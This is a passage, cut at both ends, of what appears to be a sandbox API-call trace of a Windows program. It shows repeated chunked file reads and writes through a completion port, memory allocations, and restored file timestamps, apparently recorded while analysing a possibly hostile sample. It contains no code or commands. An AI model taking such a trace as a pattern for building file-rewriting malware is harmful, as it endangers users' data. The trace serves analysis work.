_Dst=0x206b8aa) returned 0x206b8aa [0077.538] memcpy (in: _Dst=0x206b8ab, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8ab) returned 0x206b8ab [0077.538] memcpy (in: _Dst=0x206b8ac, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8ac) returned 0x206b8ac [0077.538] memcpy (in: _Dst=0x206b8ad, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8ad) returned 0x206b8ad [0077.539] memcpy (in: _Dst=0x206b8ae, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8ae) returned 0x206b8ae [0077.539] memcpy (in: _Dst=0x206b8af, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8af) returned 0x206b8af [0077.539] memcpy (in: _Dst=0x206b8b0, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b0) returned 0x206b8b0 [0077.539] memcpy (in: _Dst=0x206b8b1, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b1) returned 0x206b8b1 [0077.539] memcpy (in: _Dst=0x206b8b2, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b2) returned 0x206b8b2 [0077.539] memcpy (in: _Dst=0x206b8b3, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b3) returned 0x206b8b3 [0077.539] memcpy (in: _Dst=0x206b8b4, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b4) returned 0x206b8b4 [0077.540] memcpy (in: _Dst=0x206b8b5, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b5) returned 0x206b8b5 [0077.540] memcpy (in: _Dst=0x206b8b6, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b6) returned 0x206b8b6 [0077.540] memcpy (in: _Dst=0x206b8b7, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b7) returned 0x206b8b7 [0077.540] memcpy (in: _Dst=0x206b8b8, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b8) returned 0x206b8b8 [0077.540] memcpy (in: _Dst=0x206b8b9, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8b9) returned 0x206b8b9 [0077.540] memcpy (in: _Dst=0x206b8ba, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8ba) returned 0x206b8ba [0077.540] memcpy (in: _Dst=0x206b8bb, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8bb) returned 0x206b8bb [0077.541] memcpy (in: _Dst=0x206b8bc, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8bc) returned 0x206b8bc [0077.541] memcpy (in: _Dst=0x206b8bd, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8bd) returned 0x206b8bd [0077.541] memcpy (in: _Dst=0x206b8be, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8be) returned 0x206b8be [0077.541] memcpy (in: _Dst=0x206b8bf, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8bf) returned 0x206b8bf [0077.541] memcpy (in: _Dst=0x206b8c0, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8c0) returned 0x206b8c0 [0077.541] memcpy (in: _Dst=0x206b8c1, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8c1) returned 0x206b8c1 [0077.541] memcpy (in: _Dst=0x206b8c2, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8c2) returned 0x206b8c2 [0077.542] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.542] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.542] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.542] free (_Block=0x2060778) [0077.542] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.542] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.543] free (_Block=0x2062da0) [0077.543] free (_Block=0x53fcc0) [0077.543] free (_Block=0x2062eb8) [0077.543] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.544] GetLastError () returned 0x3e5 [0077.544] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.578] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.578] CloseHandle (hObject=0x3c0) returned 1 [0077.580] free (_Block=0x20abae0) [0077.581] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.644] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.644] CloseHandle (hObject=0x3c0) returned 1 [0077.647] free (_Block=0x20abae0) [0077.647] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.669] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x15e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.669] GetLastError () returned 0x3e5 [0077.670] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.704] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0077.713] GetLastError () returned 0x3e5 [0077.713] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.736] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x8200, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.771] GetLastError () returned 0x3e5 [0077.771] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.808] ReadFile (in: hFile=0x3b4, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0xf600, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 1 [0077.838] GetLastError () returned 0x3e5 [0077.838] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.839] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.839] CloseHandle (hObject=0x3b4) returned 1 [0077.843] free (_Block=0x20ebb50) [0077.846] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.876] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.876] CloseHandle (hObject=0x3bc) returned 1 [0077.879] free (_Block=0x3940048) [0077.879] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0078.239] ReadFile (in: hFile=0x3b0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0078.255] GetLastError () returned 0x3e5 [0078.255] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0078.784] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0078.784] GetLastError () returned 0x3e5 [0078.784] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0078.795] WriteFile (in: hFile=0x3b4, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0078.795] GetLastError () returned 0x3e5 [0078.795] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0078.819] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0x36400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0078.827] GetLastError () returned 0x3e5 [0078.827] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0078.831] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2200, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.836] GetLastError () returned 0x3e5 [0078.836] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0078.837] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0078.837] CloseHandle (hObject=0x3c0) returned 1 [0078.843] free (_Block=0x206b860) [0078.844] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.166] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.166] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.166] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.167] free (_Block=0x2060778) [0079.167] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.167] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.168] free (_Block=0x2062da0) [0079.168] free (_Block=0x53fcc0) [0079.169] free (_Block=0x2062eb8) [0079.169] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.426] GetLastError () returned 0x3e5 [0079.426] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.444] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.444] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.444] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.445] free (_Block=0x2060778) [0079.445] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.445] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.446] free (_Block=0x2062da0) [0079.446] free (_Block=0x53fcc0) [0079.446] free (_Block=0x2062eb8) [0079.446] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.447] GetLastError () returned 0x3e5 [0079.447] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.472] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2f600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.473] GetLastError () returned 0x3e5 [0079.473] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.484] ReadFile (in: hFile=0x3c0, lpBuffer=0x394007c, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0079.484] GetLastError () returned 0x3e5 [0079.484] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.504] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.505] CloseHandle (hObject=0x3c0) returned 1 [0079.508] free (_Block=0x3940048) [0079.508] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.524] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.524] GetLastError () returned 0x3e5 [0079.524] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.532] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.532] CloseHandle (hObject=0x3b0) returned 1 [0079.535] free (_Block=0x206b860) [0079.535] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.568] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0079.570] GetLastError () returned 0x3e5 [0079.570] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.571] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.571] CloseHandle (hObject=0x3bc) returned 1 [0079.575] free (_Block=0x3940048) [0079.576] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.714] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.714] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.714] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.714] free (_Block=0x2060778) [0079.714] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.714] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.715] free (_Block=0x2062da0) [0079.715] free (_Block=0x53fcc0) [0079.716] free (_Block=0x2062eb8) [0079.716] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.716] GetLastError () returned 0x3e5 [0079.716] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.737] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.737] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.737] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.738] free (_Block=0x2060778) [0079.738] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.738] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.739] free (_Block=0x2062da0) [0079.739] free (_Block=0x53fcc0) [0079.739] free (_Block=0x2062eb8) [0079.740] WriteFile (in: hFile=0x3bc, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.740] GetLastError () returned 0x3e5 [0079.740] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.754] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.754] CloseHandle (hObject=0x3c0) returned 1 [0079.757] free (_Block=0x206b860) [0079.757] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.769] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.769] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.769] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.769] free (_Block=0x2060778) [0079.769] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.769] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.770] free (_Block=0x2062da0) [0079.771] free (_Block=0x53fcc0) [0079.771] free (_Block=0x2062eb8) [0079.771] WriteFile (in: hFile=0x3b0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0079.771] GetLastError () returned 0x3e5 [0079.771] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.807] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0079.807] CloseHandle (hObject=0x3b0) returned 1 [0079.810] free (_Block=0x20abae0) [0079.810] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.822] WriteFile (in: hFile=0x3b4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0079.822] GetLastError () returned 0x3e5 [0079.822] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0079.834] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0079.834] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0079.834] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0079.835] free (_Block=0x2060778) [0079.835] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0079.835] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0079.836] free (_Block=0x2062da0) [0079.836] free (_Block=0x53fcc0) [0079.836] free (_Block=0x2062eb8) [0079.836] WriteFile (in: hFile=0x3bc, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0079.837] GetLastError () returned 0x3e5 [0079.837] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0080.184] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0080.184] GetLastError () returned 0x3e5 [0080.184] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0080.200] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.201] CloseHandle (hObject=0x3b0) returned 1 [0080.204] free (_Block=0x206b860) [0080.204] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0080.214] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.214] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.214] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.215] free (_Block=0x2060778) [0080.216] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.216] calloc (_Count=0x82, _Size=0x4) 